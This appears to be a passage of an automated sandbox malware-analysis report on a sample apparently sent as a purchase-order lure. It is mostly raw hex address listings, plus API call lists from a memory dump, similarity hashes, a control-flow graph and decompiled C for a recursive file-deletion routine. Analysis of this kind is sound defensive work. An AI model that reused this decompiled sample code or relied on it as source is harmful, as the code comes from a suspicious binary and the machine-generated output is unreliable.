                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d1db7
                                                                                      0x715d1db9
                                                                                      0x715d1dbb
                                                                                      0x715d1dbd
                                                                                      0x715d1dbd
                                                                                      0x715d1dc3
                                                                                      0x715d1dc9
                                                                                      0x715d1dcb
                                                                                      0x715d1ddf
                                                                                      0x715d1ddf
                                                                                      0x715d1de1
                                                                                      0x715d1dcd
                                                                                      0x715d1dd3
                                                                                      0x715d1dd6
                                                                                      0x715d1dd6
                                                                                      0x00000000
                                                                                      0x715d1d68
                                                                                      0x715d1d68
                                                                                      0x715d1d68
                                                                                      0x715d1d69
                                                                                      0x715d1d71
                                                                                      0x715d1d75
                                                                                      0x715d1d7b
                                                                                      0x715d1d7f
                                                                                      0x00000000
                                                                                      0x715d1d7f
                                                                                      0x715d1d6b
                                                                                      0x715d1d6b
                                                                                      0x715d1d6c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d1d6e
                                                                                      0x715d1d6f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d1d6f
                                                                                      0x715d1cff
                                                                                      0x715d1d00
                                                                                      0x715d1d09
                                                                                      0x715d1d0c
                                                                                      0x715d1d19
                                                                                      0x715d1d19
                                                                                      0x715d1d0e
                                                                                      0x715d1d0e
                                                                                      0x715d1de7
                                                                                      0x715d1dea
                                                                                      0x715d1dee
                                                                                      0x715d1e61
                                                                                      0x715d1e65
                                                                                      0x715d1c43
                                                                                      0x00000000
                                                                                      0x715d1c43
                                                                                      0x00000000
                                                                                      0x715d1e65
                                                                                      0x715d1cfd
                                                                                      0x715d1c68
                                                                                      0x715d1c6b
                                                                                      0x715d1cce
                                                                                      0x715d1cd1
                                                                                      0x715d1ce3
                                                                                      0x715d1ce3
                                                                                      0x715d1ce6
                                                                                      0x715d1df3
                                                                                      0x715d1df6
                                                                                      0x715d1df6
                                                                                      0x715d1df8
                                                                                      0x715d21ae
                                                                                      0x715d21c6
                                                                                      0x715d21c6
                                                                                      0x715d21c9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d21b3
                                                                                      0x715d21b4
                                                                                      0x715d21b7
                                                                                      0x715d21ba
                                                                                      0x715d2244
                                                                                      0x715d224b
                                                                                      0x715d2251
                                                                                      0x715d2255
                                                                                      0x715d1e5c
                                                                                      0x715d1e5d
                                                                                      0x715d1e5d
                                                                                      0x715d1e5e
                                                                                      0x00000000
                                                                                      0x715d1e5e
                                                                                      0x715d21c0
                                                                                      0x715d21c3
                                                                                      0x715d21c3
                                                                                      0x715d21cb
                                                                                      0x715d21ce
                                                                                      0x715d2238
                                                                                      0x715d1e51
                                                                                      0x715d1e54
                                                                                      0x715d1e57
                                                                                      0x715d1e5a
                                                                                      0x715d1e5a
                                                                                      0x00000000
                                                                                      0x715d1e5a
                                                                                      0x715d21d0
                                                                                      0x715d21d3
                                                                                      0x715d21da
                                                                                      0x715d21da
                                                                                      0x715d21dd
                                                                                      0x715d21e1
                                                                                      0x715d21f5
                                                                                      0x715d21f5
                                                                                      0x715d21f8
                                                                                      0x715d21fc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d21fe
                                                                                      0x715d2202
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d2204
                                                                                      0x715d220b
                                                                                      0x715d220b
                                                                                      0x715d2211
                                                                                      0x715d2214
                                                                                      0x715d2230
                                                                                      0x715d2216
                                                                                      0x715d221f
                                                                                      0x715d2222
                                                                                      0x715d2222
                                                                                      0x00000000
                                                                                      0x715d2214
                                                                                      0x715d21e3
                                                                                      0x715d21e6
                                                                                      0x715d21ea
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d21ec
                                                                                      0x00000000
                                                                                      0x715d21ec
                                                                                      0x715d21d5
                                                                                      0x715d21d8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d21d8
                                                                                      0x715d1dfe
                                                                                      0x715d1dfe
                                                                                      0x715d1dff
                                                                                      0x715d1f49
                                                                                      0x715d1f49
                                                                                      0x715d1f50
                                                                                      0x715d1f53
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d1f60
                                                                                      0x00000000
                                                                                      0x715d214b
                                                                                      0x715d214e
                                                                                      0x715d2151
                                                                                      0x715d2151
                                                                                      0x715d2152
                                                                                      0x715d2153
                                                                                      0x715d2156
                                                                                      0x715d2159
                                                                                      0x715d215c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d215e
                                                                                      0x715d215e
                                                                                      0x715d2162
                                                                                      0x715d217a
                                                                                      0x715d217d
                                                                                      0x715d2181
                                                                                      0x715d2187
                                                                                      0x00000000
                                                                                      0x715d2187
                                                                                      0x715d2164
                                                                                      0x715d2164
                                                                                      0x715d2167
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d2169
                                                                                      0x715d216c
                                                                                      0x715d216e
                                                                                      0x715d216f
                                                                                      0x715d216f
                                                                                      0x715d216f
                                                                                      0x715d2170
                                                                                      0x715d2173
                                                                                      0x715d2176
                                                                                      0x715d2177
                                                                                      0x715d2151
                                                                                      0x715d2152
                                                                                      0x715d2153
                                                                                      0x715d2156
                                                                                      0x715d2159
                                                                                      0x715d215c
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d215c
                                                                                      0x00000000
                                                                                      0x715d1fa7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d1fb3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d1f9a
                                                                                      0x715d1f9e
                                                                                      0x715d1fa2
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d211c
                                                                                      0x715d2120
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d2126
                                                                                      0x715d212f
                                                                                      0x715d2136
                                                                                      0x715d213e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d2083
                                                                                      0x715d2083
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d1fbc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d21a6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d208b
                                                                                      0x715d208d
                                                                                      0x715d208d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d2196
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d219a
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d21a2
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d20d3
                                                                                      0x715d20d5
                                                                                      0x715d20d5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d209d
                                                                                      0x715d209f
                                                                                      0x715d209f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d20af
                                                                                      0x715d20b1
                                                                                      0x715d20b1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d20e1
                                                                                      0x715d20e3
                                                                                      0x715d20e3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d20ba
                                                                                      0x715d20bc
                                                                                      0x715d20bc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d20c1
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d219e
                                                                                      0x715d21a8
                                                                                      0x715d21a8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d20ec
                                                                                      0x715d20f0
                                                                                      0x715d20f5
                                                                                      0x715d20f8
                                                                                      0x715d20f9
                                                                                      0x715d20fc
                                                                                      0x715d2102
                                                                                      0x715d2102
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d218e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d20c5
                                                                                      0x715d20c7
                                                                                      0x715d20c7
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d1fc3
                                                                                      0x715d1fc3
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d20da
                                                                                      0x715d20dc
                                                                                      0x715d20dc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d1f67
                                                                                      0x715d1f6d
                                                                                      0x715d1f70
                                                                                      0x715d1f72
                                                                                      0x715d1f72
                                                                                      0x715d1f75
                                                                                      0x715d1f79
                                                                                      0x715d1f86
                                                                                      0x715d1f88
                                                                                      0x715d1f8e
                                                                                      0x715d1f8e
                                                                                      0x715d1f8e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d208e
                                                                                      0x715d208e
                                                                                      0x715d2090
                                                                                      0x715d2097
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d20d6
                                                                                      0x715d20d6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d20a0
                                                                                      0x715d20a0
                                                                                      0x715d20a2
                                                                                      0x715d20a9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d20b2
                                                                                      0x715d20b2
                                                                                      0x715d20b4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d20e4
                                                                                      0x715d20e4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d20bd
                                                                                      0x715d20bd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d210a
                                                                                      0x715d210e
                                                                                      0x715d2113
                                                                                      0x715d2116
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d20c8
                                                                                      0x715d20c8
                                                                                      0x715d20cb
                                                                                      0x715d20cd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d20dd
                                                                                      0x715d20dd
                                                                                      0x715d20e6
                                                                                      0x715d20e6
                                                                                      0x715d1fc5
                                                                                      0x715d1fc5
                                                                                      0x715d1fc8
                                                                                      0x715d1fcf
                                                                                      0x715d1fd1
                                                                                      0x715d1fd3
                                                                                      0x715d1fda
                                                                                      0x715d1fdd
                                                                                      0x715d1fe2
                                                                                      0x715d1fe4
                                                                                      0x715d1fe6
                                                                                      0x715d1fea
                                                                                      0x715d1ff0
                                                                                      0x715d1ff6
                                                                                      0x715d1ff6
                                                                                      0x715d1ff8
                                                                                      0x715d1ff8
                                                                                      0x715d1ff9
                                                                                      0x715d1ff9
                                                                                      0x715d1ffd
                                                                                      0x715d2003
                                                                                      0x715d2005
                                                                                      0x715d2009
                                                                                      0x715d200e
                                                                                      0x715d200e
                                                                                      0x715d2010
                                                                                      0x715d2010
                                                                                      0x715d2013
                                                                                      0x715d2016
                                                                                      0x715d201f
                                                                                      0x715d2025
                                                                                      0x715d2028
                                                                                      0x715d2028
                                                                                      0x715d202a
                                                                                      0x715d202d
                                                                                      0x715d2033
                                                                                      0x715d2039
                                                                                      0x715d2039
                                                                                      0x715d203b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d2041
                                                                                      0x715d2041
                                                                                      0x715d2045
                                                                                      0x715d204c
                                                                                      0x715d2070
                                                                                      0x715d2070
                                                                                      0x715d2074
                                                                                      0x715d2076
                                                                                      0x715d2079
                                                                                      0x715d2079
                                                                                      0x715d207c
                                                                                      0x715d207c
                                                                                      0x00000000
                                                                                      0x715d2074
                                                                                      0x715d2051
                                                                                      0x715d2054
                                                                                      0x715d2054
                                                                                      0x715d205b
                                                                                      0x715d205d
                                                                                      0x715d2060
                                                                                      0x715d2067
                                                                                      0x715d2068
                                                                                      0x715d206e
                                                                                      0x715d206e
                                                                                      0x00000000
                                                                                      0x715d206e
                                                                                      0x715d2062
                                                                                      0x715d2065
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d2065
                                                                                      0x715d1ff2
                                                                                      0x715d1ff4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d1f60
                                                                                      0x715d1e05
                                                                                      0x715d1e05
                                                                                      0x715d1e06
                                                                                      0x715d1f46
                                                                                      0x00000000
                                                                                      0x715d1f46
                                                                                      0x715d1e0c
                                                                                      0x715d1e0d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d1e13
                                                                                      0x715d1e16
                                                                                      0x715d1f0b
                                                                                      0x715d1f0b
                                                                                      0x715d1f0e
                                                                                      0x715d1f23
                                                                                      0x715d1f25
                                                                                      0x715d1f25
                                                                                      0x715d1f26
                                                                                      0x715d1f29
                                                                                      0x715d1f2c
                                                                                      0x715d1f38
                                                                                      0x715d1f38
                                                                                      0x715d1f38
                                                                                      0x715d1f2e
                                                                                      0x715d1f2e
                                                                                      0x715d1f2e
                                                                                      0x715d1f3e
                                                                                      0x00000000
                                                                                      0x715d1f3e
                                                                                      0x715d1f10
                                                                                      0x715d1f10
                                                                                      0x715d1f11
                                                                                      0x715d1f1f
                                                                                      0x00000000
                                                                                      0x715d1f1f
                                                                                      0x715d1f14
                                                                                      0x715d1f15
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d1f1b
                                                                                      0x00000000
                                                                                      0x715d1f1b
                                                                                      0x715d1e1c
                                                                                      0x715d1f07
                                                                                      0x00000000
                                                                                      0x715d1f07
                                                                                      0x715d1e22
                                                                                      0x715d1e22
                                                                                      0x715d1e25
                                                                                      0x715d1e4e
                                                                                      0x00000000
                                                                                      0x715d1e4e
                                                                                      0x715d1e27
                                                                                      0x715d1e27
                                                                                      0x715d1e2a
                                                                                      0x715d1e44
                                                                                      0x00000000
                                                                                      0x715d1e44
                                                                                      0x715d1e2c
                                                                                      0x715d1e2c
                                                                                      0x715d1e2f
                                                                                      0x715d1e3e
                                                                                      0x00000000
                                                                                      0x715d1e3e
                                                                                      0x715d1e32
                                                                                      0x715d1e33
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d1e35
                                                                                      0x00000000
                                                                                      0x715d1cec
                                                                                      0x715d1cec
                                                                                      0x715d1cef
                                                                                      0x00000000
                                                                                      0x715d1cef
                                                                                      0x715d1ce6
                                                                                      0x715d1cd3
                                                                                      0x715d1cd8
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d1cda
                                                                                      0x715d1cdd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d1cdd
                                                                                      0x715d1c6d
                                                                                      0x715d1c70
                                                                                      0x715d1ca6
                                                                                      0x715d1ca9
                                                                                      0x00000000
                                                                                      0x715d1caf
                                                                                      0x715d1cb1
                                                                                      0x715d1cb5
                                                                                      0x715d1cbc
                                                                                      0x715d1cc3
                                                                                      0x715d1cc6
                                                                                      0x715d1cc9
                                                                                      0x00000000
                                                                                      0x715d1cc9
                                                                                      0x715d1ca9
                                                                                      0x715d1c72
                                                                                      0x715d1c73
                                                                                      0x715d1c8e
                                                                                      0x715d1c91
                                                                                      0x00000000
                                                                                      0x715d1c97
                                                                                      0x715d1c97
                                                                                      0x715d1c9e
                                                                                      0x715d1ca1
                                                                                      0x00000000
                                                                                      0x715d1ca1
                                                                                      0x715d1c91
                                                                                      0x715d1c78
                                                                                      0x00000000
                                                                                      0x715d1c7e
                                                                                      0x715d1c7e
                                                                                      0x715d1c85
                                                                                      0x00000000
                                                                                      0x715d1c85
                                                                                      0x715d1c78
                                                                                      0x715d1e74
                                                                                      0x715d1e79
                                                                                      0x715d1e7e
                                                                                      0x715d1e82
                                                                                      0x715d2355
                                                                                      0x715d235b
                                                                                      0x715d1e94
                                                                                      0x715d1e96
                                                                                      0x715d1e97
                                                                                      0x715d227e
                                                                                      0x715d227e
                                                                                      0x715d2281
                                                                                      0x715d2284
                                                                                      0x715d22a1
                                                                                      0x715d22a7
                                                                                      0x715d22a9
                                                                                      0x715d22af
                                                                                      0x715d22c6
                                                                                      0x715d22c6
                                                                                      0x715d22c6
                                                                                      0x715d22d3
                                                                                      0x715d22d9
                                                                                      0x715d22dc
                                                                                      0x715d22e2
                                                                                      0x715d22e4
                                                                                      0x715d22e8
                                                                                      0x715d22ea
                                                                                      0x715d22f1
                                                                                      0x715d22f6
                                                                                      0x715d22f9
                                                                                      0x715d22fb
                                                                                      0x715d2300
                                                                                      0x715d2312
                                                                                      0x715d2312
                                                                                      0x715d2300
                                                                                      0x715d22f9
                                                                                      0x715d22e8
                                                                                      0x715d2318
                                                                                      0x715d231b
                                                                                      0x715d2325
                                                                                      0x715d232d
                                                                                      0x715d233a
                                                                                      0x715d2340
                                                                                      0x715d2343
                                                                                      0x715d2273
                                                                                      0x715d2273
                                                                                      0x00000000
                                                                                      0x715d2273
                                                                                      0x715d2349
                                                                                      0x715d234f
                                                                                      0x715d234f
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d2351
                                                                                      0x715d2351
                                                                                      0x715d2351
                                                                                      0x715d2351
                                                                                      0x00000000
                                                                                      0x715d231d
                                                                                      0x715d231d
                                                                                      0x715d2323
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d2323
                                                                                      0x715d231b
                                                                                      0x715d22b2
                                                                                      0x715d22b8
                                                                                      0x715d22ba
                                                                                      0x715d22c0
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d22c0
                                                                                      0x715d2286
                                                                                      0x715d228d
                                                                                      0x715d2293
                                                                                      0x715d2299
                                                                                      0x00000000
                                                                                      0x715d2299
                                                                                      0x715d1e9d
                                                                                      0x715d1e9e
                                                                                      0x715d225d
                                                                                      0x715d225d
                                                                                      0x715d2263
                                                                                      0x715d2266
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d226d
                                                                                      0x715d2272
                                                                                      0x00000000
                                                                                      0x715d2272
                                                                                      0x715d1ea5
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d1eab
                                                                                      0x715d1eab
                                                                                      0x715d1eb4
                                                                                      0x715d1eb9
                                                                                      0x715d1ebf
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x715d1ec5
                                                                                      0x715d1ed2
                                                                                      0x715d1ed8
                                                                                      0x715d1ee2
                                                                                      0x715d1ee8
                                                                                      0x715d1ef0
                                                                                      0x715d1f00
                                                                                      0x00000000
                                                                                      0x715d1f00

                                                                                      APIs
                                                                                        • Part of subcall function 715D12BB: GlobalAlloc.KERNELBASE(00000040,?,715D12DB,?,715D137F,00000019,715D11CA,-000000A0), ref: 715D12C5
                                                                                      • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 715D1D2D
                                                                                      • lstrcpyW.KERNEL32(00000008,?), ref: 715D1D75
                                                                                      • lstrcpyW.KERNEL32(00000808,?), ref: 715D1D7F
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 715D1D92
                                                                                      • GlobalFree.KERNEL32(?), ref: 715D1E74
                                                                                      • GlobalFree.KERNEL32(?), ref: 715D1E79
                                                                                      • GlobalFree.KERNEL32(?), ref: 715D1E7E
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 715D2068
                                                                                      • lstrcpyW.KERNEL32(?,?), ref: 715D2222
                                                                                      • GetModuleHandleW.KERNEL32(00000008), ref: 715D22A1
                                                                                      • LoadLibraryW.KERNEL32(00000008), ref: 715D22B2
                                                                                      • GetProcAddress.KERNEL32(?,?), ref: 715D230C
                                                                                      • lstrlenW.KERNEL32(00000808), ref: 715D2326
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.42123282822.00000000715D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 715D0000, based on PE: true
                                                                                      • Associated: 00000001.00000002.42123234806.00000000715D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42123363731.00000000715D4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.42123419116.00000000715D6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_715d0000_PO#4200000866.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 245916457-0
                                                                                      • Opcode ID: 9e1f49a7f2ba6c758d66d357548a1a0d946a292a75f871f6113a318123aecbbc
                                                                                      • Instruction ID: c744f3c23c05c1cf724663f53ac9f6a8db43155dd9b443fa73baea06dce8f2b1
                                                                                      • Opcode Fuzzy Hash: 9e1f49a7f2ba6c758d66d357548a1a0d946a292a75f871f6113a318123aecbbc
                                                                                      • Instruction Fuzzy Hash: 2F227A71D0420ADEDB1AEFB8C9C06AEBBF5FB04315F10896ED1E6E6290D7709685CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 669 405d74-405d9a call 40603f 672 405db3-405dba 669->672 673 405d9c-405dae DeleteFileW 669->673 675 405dbc-405dbe 672->675 676 405dcd-405ddd call 406668 672->676 674 405f30-405f34 673->674 677 405dc4-405dc7 675->677 678 405ede-405ee3 675->678 684 405dec-405ded call 405f83 676->684 685 405ddf-405dea lstrcatW 676->685 677->676 677->678 678->674 680 405ee5-405ee8 678->680 682 405ef2-405efa call 40699e 680->682 683 405eea-405ef0 680->683 682->674 693 405efc-405f10 call 405f37 call 405d2c 682->693 683->674 687 405df2-405df6 684->687 685->687 689 405e02-405e08 lstrcatW 687->689 690 405df8-405e00 687->690 692 405e0d-405e29 lstrlenW FindFirstFileW 689->692 690->689 690->692 694 405ed3-405ed7 692->694 695 405e2f-405e37 692->695 709 405f12-405f15 693->709 710 405f28-405f2b call 4056ca 693->710 694->678 700 405ed9 694->700 697 405e57-405e6b call 406668 695->697 698 405e39-405e41 695->698 711 405e82-405e8d call 405d2c 697->711 712 405e6d-405e75 697->712 701 405e43-405e4b 698->701 702 405eb6-405ec6 FindNextFileW 698->702 700->678 701->697 705 405e4d-405e55 701->705 702->695 708 405ecc-405ecd FindClose 702->708 705->697 705->702 708->694 709->683 715 405f17-405f26 call 4056ca call 406428 709->715 710->674 720 405eae-405eb1 call 4056ca 711->720 721 405e8f-405e92 711->721 712->702 716 405e77-405e80 call 405d74 712->716 715->674 716->702 720->702 724 405e94-405ea4 call 4056ca call 406428 721->724 725 405ea6-405eac 721->725 724->702 725->702
                                                                                      C-Code - Quality: 98%
                                                                                      			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
                                                                                      				signed int _v8;
                                                                                      				signed int _v12;
                                                                                      				short _v556;
                                                                                      				short _v558;
                                                                                      				struct _WIN32_FIND_DATAW _v604;
                                                                                      				signed int _t38;
                                                                                      				signed int _t52;
                                                                                      				signed int _t55;
                                                                                      				signed int _t62;
                                                                                      				void* _t64;
                                                                                      				signed char _t65;
                                                                                      				WCHAR* _t66;
                                                                                      				void* _t67;
                                                                                      				WCHAR* _t68;
                                                                                      				void* _t70;
                                                                                      
                                                                                      				_t65 = _a8;
                                                                                      				_t68 = _a4;
                                                                                      				_v8 = _t65 & 0x00000004;
                                                                                      				_t38 = E0040603F(__eflags, _t68);
                                                                                      				_v12 = _t38;
                                                                                      				if((_t65 & 0x00000008) != 0) {
                                                                                      					_t62 = DeleteFileW(_t68); // executed
                                                                                      					asm("sbb eax, eax");
                                                                                      					_t64 =  ~_t62 + 1;
                                                                                      					 *0x42a2e8 =  *0x42a2e8 + _t64;
                                                                                      					return _t64;
                                                                                      				}
                                                                                      				_a4 = _t65;
                                                                                      				_t8 =  &_a4;
                                                                                      				 *_t8 = _a4 & 0x00000001;
                                                                                      				__eflags =  *_t8;
                                                                                      				if( *_t8 == 0) {
                                                                                      					L5:
                                                                                      					E00406668(0x425750, _t68);
                                                                                      					__eflags = _a4;
                                                                                      					if(_a4 == 0) {
                                                                                      						E00405F83(_t68);
                                                                                      					} else {
                                                                                      						lstrcatW(0x425750, L"\\*.*");
                                                                                      					}
                                                                                      					__eflags =  *_t68;
                                                                                      					if( *_t68 != 0) {
                                                                                      						L10:
                                                                                      						lstrcatW(_t68, 0x40a014);
                                                                                      						L11:
                                                                                      						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                                                      						_t38 = FindFirstFileW(0x425750,  &_v604);
                                                                                      						_t70 = _t38;
                                                                                      						__eflags = _t70 - 0xffffffff;
                                                                                      						if(_t70 == 0xffffffff) {
                                                                                      							L26:
                                                                                      							__eflags = _a4;
                                                                                      							if(_a4 != 0) {
                                                                                      								_t30 = _t66 - 2;
                                                                                      								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                                                      								__eflags =  *_t30;
                                                                                      							}
                                                                                      							goto L28;
                                                                                      						} else {
                                                                                      							goto L12;
                                                                                      						}
                                                                                      						do {
                                                                                      							L12:
                                                                                      							__eflags = _v604.cFileName - 0x2e;
                                                                                      							if(_v604.cFileName != 0x2e) {
                                                                                      								L16:
                                                                                      								E00406668(_t66,  &(_v604.cFileName));
                                                                                      								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                                                      								if(__eflags == 0) {
                                                                                      									_t52 = E00405D2C(__eflags, _t68, _v8);
                                                                                      									__eflags = _t52;
                                                                                      									if(_t52 != 0) {
                                                                                      										E004056CA(0xfffffff2, _t68);
                                                                                      									} else {
                                                                                      										__eflags = _v8 - _t52;
                                                                                      										if(_v8 == _t52) {
                                                                                      											 *0x42a2e8 =  *0x42a2e8 + 1;
                                                                                      										} else {
                                                                                      											E004056CA(0xfffffff1, _t68);
                                                                                      											E00406428(_t67, _t68, 0);
                                                                                      										}
                                                                                      									}
                                                                                      								} else {
                                                                                      									__eflags = (_a8 & 0x00000003) - 3;
                                                                                      									if(__eflags == 0) {
                                                                                      										E00405D74(__eflags, _t68, _a8);
                                                                                      									}
                                                                                      								}
                                                                                      								goto L24;
                                                                                      							}
                                                                                      							__eflags = _v558;
                                                                                      							if(_v558 == 0) {
                                                                                      								goto L24;
                                                                                      							}
                                                                                      							__eflags = _v558 - 0x2e;
                                                                                      							if(_v558 != 0x2e) {
                                                                                      								goto L16;
                                                                                      							}
                                                                                      							__eflags = _v556;
                                                                                      							if(_v556 == 0) {
                                                                                      								goto L24;
                                                                                      							}
                                                                                      							goto L16;
                                                                                      							L24:
                                                                                      							_t55 = FindNextFileW(_t70,  &_v604);
                                                                                      							__eflags = _t55;
                                                                                      						} while (_t55 != 0);
                                                                                      						_t38 = FindClose(_t70);
                                                                                      						goto L26;
                                                                                      					}
                                                                                      					__eflags =  *0x425750 - 0x5c;
                                                                                      					if( *0x425750 != 0x5c) {
                                                                                      						goto L11;
                                                                                      					}
                                                                                      					goto L10;
                                                                                      				} else {
                                                                                      					__eflags = _t38;
                                                                                      					if(_t38 == 0) {
                                                                                      						L28:
                                                                                      						__eflags = _a4;
                                                                                      						if(_a4 == 0) {
                                                                                      							L36:
                                                                                      							return _t38;
                                                                                      						}
                                                                                      						__eflags = _v12;
                                                                                      						if(_v12 != 0) {
                                                                                      							_t38 = E0040699E(_t68);
                                                                                      							__eflags = _t38;
                                                                                      							if(_t38 == 0) {
                                                                                      								goto L36;
                                                                                      							}
                                                                                      							E00405F37(_t68);
                                                                                      							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
                                                                                      							__eflags = _t38;
                                                                                      							if(_t38 != 0) {
                                                                                      								return E004056CA(0xffffffe5, _t68);
                                                                                      							}
                                                                                      							__eflags = _v8;
                                                                                      							if(_v8 == 0) {
                                                                                      								goto L30;
                                                                                      							}
                                                                                      							E004056CA(0xfffffff1, _t68);
                                                                                      							return E00406428(_t67, _t68, 0);
                                                                                      						}
                                                                                      						L30:
                                                                                      						 *0x42a2e8 =  *0x42a2e8 + 1;
                                                                                      						return _t38;
                                                                                      					}
                                                                                      					__eflags = _t65 & 0x00000002;
                                                                                      					if((_t65 & 0x00000002) == 0) {
                                                                                      						goto L28;
                                                                                      					}
                                                                                      					goto L5;
                                                                                      				}
                                                                                      			}


















                                                                                      0x00405d7e
                                                                                      0x00405d83
                                                                                      0x00405d8c
                                                                                      0x00405d8f
                                                                                      0x00405d97
                                                                                      0x00405d9a
                                                                                      0x00405d9d
                                                                                      0x00405da5
                                                                                      0x00405da7
                                                                                      0x00405da8
                                                                                      0x00000000
                                                                                      0x00405da8
                                                                                      0x00405db3
                                                                                      0x00405db6
                                                                                      0x00405db6
                                                                                      0x00405db6
                                                                                      0x00405dba
                                                                                      0x00405dcd
                                                                                      0x00405dd4
                                                                                      0x00405dd9
                                                                                      0x00405ddd
                                                                                      0x00405ded
                                                                                      0x00405ddf
                                                                                      0x00405de5
                                                                                      0x00405de5
                                                                                      0x00405df2
                                                                                      0x00405df6
                                                                                      0x00405e02
                                                                                      0x00405e08
                                                                                      0x00405e0d
                                                                                      0x00405e13
                                                                                      0x00405e1e
                                                                                      0x00405e24
                                                                                      0x00405e26
                                                                                      0x00405e29
                                                                                      0x00405ed3
                                                                                      0x00405ed3
                                                                                      0x00405ed7
                                                                                      0x00405ed9
                                                                                      0x00405ed9
                                                                                      0x00405ed9
                                                                                      0x00405ed9
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00405e2f
                                                                                      0x00405e2f
                                                                                      0x00405e2f
                                                                                      0x00405e37
                                                                                      0x00405e57
                                                                                      0x00405e5f
                                                                                      0x00405e64
                                                                                      0x00405e6b
                                                                                      0x00405e86
                                                                                      0x00405e8b
                                                                                      0x00405e8d
                                                                                      0x00405eb1
                                                                                      0x00405e8f
                                                                                      0x00405e8f
                                                                                      0x00405e92
                                                                                      0x00405ea6
                                                                                      0x00405e94
                                                                                      0x00405e97
                                                                                      0x00405e9f
                                                                                      0x00405e9f
                                                                                      0x00405e92
                                                                                      0x00405e6d
                                                                                      0x00405e73
